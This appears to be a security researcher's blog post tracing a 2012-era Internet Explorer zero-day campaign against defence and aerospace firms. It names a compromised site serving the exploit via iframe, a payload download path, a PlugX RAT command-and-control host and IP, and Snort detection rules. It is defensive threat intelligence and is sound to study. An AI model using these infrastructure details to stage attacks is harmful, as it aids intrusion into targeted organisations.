Following our investigations on the servers found serving the Internet Explorer Zeroday and using OSINT, we were able to use the WHOIS mail address and the ip addresses used by the attackers to find fake domains registered by them that contain specific names of companies related with:
- US Aircraft and weapons delivery systems company
- US Defence decoy countermeasures company
- US Aerospace and defence technology company
- US Supplier for repairs of tactical fighters
- Laboratory for energetic systems and materials
- UK Defence contractor
We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.
We were able to check that the official website of the company has been compromised as well and it is serving the Internet Explorer ZeroDay to the visitors. They’ve included an iframe to the exploit in the entry page:
The version of the exploit found seems to be based on the code that we found in the previous servers and also uses the Grumgog.swf Flash file to aid on the exploitation.
Apart from that, it seems the exploit code has evolved and they are now able to infect not only Windows XP but also Windows 7 32 bits running Java6. This is based on the Dodge.html file we found within the exploit code:
The flash file is also encrypted with DoSWF as the previous versions and licensed to email@example.com. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.
The PlugX RAT connect to a C&C server on oXXX.blogdns.com that resolvs to 126.96.36.199. I recommend you to search your logs for connections to that ip address since it will be a symptom of a compromised system.
In the other hand, these Emerging Threats Snort rules will help you catching exploit attempts and related activity:
2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day